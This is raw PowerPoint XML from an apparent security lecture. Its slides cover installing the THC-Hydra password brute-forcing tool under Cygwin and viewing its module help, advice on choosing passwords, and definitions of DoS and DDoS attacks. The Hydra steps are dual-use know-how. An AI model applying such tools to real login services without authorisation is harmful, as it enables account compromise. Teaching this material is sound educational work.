          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Download and install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CYGWIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux-like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>environment for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Go to the directory of hydra:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CYGWIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>cd C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>hydra-7.3     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>./configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>", then "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>make</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>" and finally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>make</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0">
              <a:effectLst/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For help type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hydra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For help for module: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hydra –U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>module-name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hydra –U http-form-post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>maaaaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>thc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>-hydra-windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="http://upload.wikimedia.org/wikipedia/commons/thumb/2/29/Cygwin_logo.svg/512px-Cygwin_logo.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4200" y="1368513"/>
            <a:ext cx="1676400" cy="1676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84236966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143000"/>
            <a:ext cx="4876800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>THC-Hydra</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552700"/>
            <a:ext cx="3810000" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>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47" t="36065" r="82417" b="23889"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="1371600"/>
            <a:ext cx="2855495" cy="2051637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>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txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="4114800"/>
            <a:ext cx="4876800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" bIns="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="5000" b="1" kern="1200" cap="none" baseline="0">
                <a:ln w="500">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FAF7C8"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DEMO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308115265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protect?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Choosing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>good passwords:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-338138">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>ith </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>a Base Word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Phrase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cstfttt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-338138">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Lengthen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Phrase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cstftttGmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-338138">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Scramble </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Phrase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CstftttGm@il</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-338138">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Lastly: Rotate/Change Your Password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Regularly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hbd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Gmail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use Strong Password Generator:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FlyingBit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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82</a:t>
            </a:fld>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1599" y="4114800"/>
            <a:ext cx="2539235" cy="2302300"/>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7178363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
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>enial of Service Attack (DoS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is Denial of Service attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attempt to make a computer resource </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>unavailable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to its intended </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sending </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>messages which exhaust service provider’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>etwork </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bandwidth, system resources, application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218"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096000" y="4800599"/>
            <a:ext cx="2438400" cy="1677567"/>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04174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a:t>Distributed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Denial-of-service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(DDoS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DDoS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Employing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>multiple (dozens  to millions) compromised computers to perform a coordinated and widely distributed DoS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attack</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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1905000" y="3634596"/>
            <a:ext cx="5334000" cy="2590800"/>
            <a:chOff x="1447800" y="1600200"/>
            <a:chExt cx="6858000" cy="4038600"/>
          </a:xfrm>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3124200" y="2514600"/>
              <a:ext cx="2486025" cy="1827213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 292 w 2235"/>
                <a:gd name="T1" fmla="*/ 585 h 1642"/>
                <a:gd name="T2" fmla="*/ 172 w 2235"/>
                <a:gd name="T3" fmla="*/ 594 h 1642"/>
                <a:gd name="T4" fmla="*/ 103 w 2235"/>
                <a:gd name="T5" fmla="*/ 628 h 1642"/>
                <a:gd name="T6" fmla="*/ 0 w 2235"/>
                <a:gd name="T7" fmla="*/ 869 h 1642"/>
                <a:gd name="T8" fmla="*/ 43 w 2235"/>
                <a:gd name="T9" fmla="*/ 1084 h 1642"/>
                <a:gd name="T10" fmla="*/ 86 w 2235"/>
                <a:gd name="T11" fmla="*/ 1178 h 1642"/>
                <a:gd name="T12" fmla="*/ 94 w 2235"/>
                <a:gd name="T13" fmla="*/ 1204 h 1642"/>
                <a:gd name="T14" fmla="*/ 215 w 2235"/>
                <a:gd name="T15" fmla="*/ 1299 h 1642"/>
                <a:gd name="T16" fmla="*/ 404 w 2235"/>
                <a:gd name="T17" fmla="*/ 1470 h 1642"/>
                <a:gd name="T18" fmla="*/ 472 w 2235"/>
                <a:gd name="T19" fmla="*/ 1531 h 1642"/>
                <a:gd name="T20" fmla="*/ 498 w 2235"/>
                <a:gd name="T21" fmla="*/ 1539 h 1642"/>
                <a:gd name="T22" fmla="*/ 533 w 2235"/>
                <a:gd name="T23" fmla="*/ 1556 h 1642"/>
                <a:gd name="T24" fmla="*/ 653 w 2235"/>
                <a:gd name="T25" fmla="*/ 1642 h 1642"/>
                <a:gd name="T26" fmla="*/ 1410 w 2235"/>
                <a:gd name="T27" fmla="*/ 1617 h 1642"/>
                <a:gd name="T28" fmla="*/ 1530 w 2235"/>
                <a:gd name="T29" fmla="*/ 1582 h 1642"/>
                <a:gd name="T30" fmla="*/ 1667 w 2235"/>
                <a:gd name="T31" fmla="*/ 1548 h 1642"/>
                <a:gd name="T32" fmla="*/ 1814 w 2235"/>
                <a:gd name="T33" fmla="*/ 1410 h 1642"/>
                <a:gd name="T34" fmla="*/ 1882 w 2235"/>
                <a:gd name="T35" fmla="*/ 1307 h 1642"/>
                <a:gd name="T36" fmla="*/ 1925 w 2235"/>
                <a:gd name="T37" fmla="*/ 1264 h 1642"/>
                <a:gd name="T38" fmla="*/ 2054 w 2235"/>
                <a:gd name="T39" fmla="*/ 989 h 1642"/>
                <a:gd name="T40" fmla="*/ 2132 w 2235"/>
                <a:gd name="T41" fmla="*/ 903 h 1642"/>
                <a:gd name="T42" fmla="*/ 2175 w 2235"/>
                <a:gd name="T43" fmla="*/ 826 h 1642"/>
                <a:gd name="T44" fmla="*/ 2192 w 2235"/>
                <a:gd name="T45" fmla="*/ 791 h 1642"/>
                <a:gd name="T46" fmla="*/ 2235 w 2235"/>
                <a:gd name="T47" fmla="*/ 645 h 1642"/>
                <a:gd name="T48" fmla="*/ 2226 w 2235"/>
                <a:gd name="T49" fmla="*/ 551 h 1642"/>
                <a:gd name="T50" fmla="*/ 1908 w 2235"/>
                <a:gd name="T51" fmla="*/ 456 h 1642"/>
                <a:gd name="T52" fmla="*/ 1857 w 2235"/>
                <a:gd name="T53" fmla="*/ 430 h 1642"/>
                <a:gd name="T54" fmla="*/ 1805 w 2235"/>
                <a:gd name="T55" fmla="*/ 267 h 1642"/>
                <a:gd name="T56" fmla="*/ 1728 w 2235"/>
                <a:gd name="T57" fmla="*/ 232 h 1642"/>
                <a:gd name="T58" fmla="*/ 1547 w 2235"/>
                <a:gd name="T59" fmla="*/ 181 h 1642"/>
                <a:gd name="T60" fmla="*/ 1427 w 2235"/>
                <a:gd name="T61" fmla="*/ 147 h 1642"/>
                <a:gd name="T62" fmla="*/ 1392 w 2235"/>
                <a:gd name="T63" fmla="*/ 129 h 1642"/>
                <a:gd name="T64" fmla="*/ 1203 w 2235"/>
                <a:gd name="T65" fmla="*/ 104 h 1642"/>
                <a:gd name="T66" fmla="*/ 1091 w 2235"/>
                <a:gd name="T67" fmla="*/ 18 h 1642"/>
                <a:gd name="T68" fmla="*/ 1040 w 2235"/>
                <a:gd name="T69" fmla="*/ 0 h 1642"/>
                <a:gd name="T70" fmla="*/ 928 w 2235"/>
                <a:gd name="T71" fmla="*/ 9 h 1642"/>
                <a:gd name="T72" fmla="*/ 851 w 2235"/>
                <a:gd name="T73" fmla="*/ 35 h 1642"/>
                <a:gd name="T74" fmla="*/ 816 w 2235"/>
                <a:gd name="T75" fmla="*/ 61 h 1642"/>
                <a:gd name="T76" fmla="*/ 791 w 2235"/>
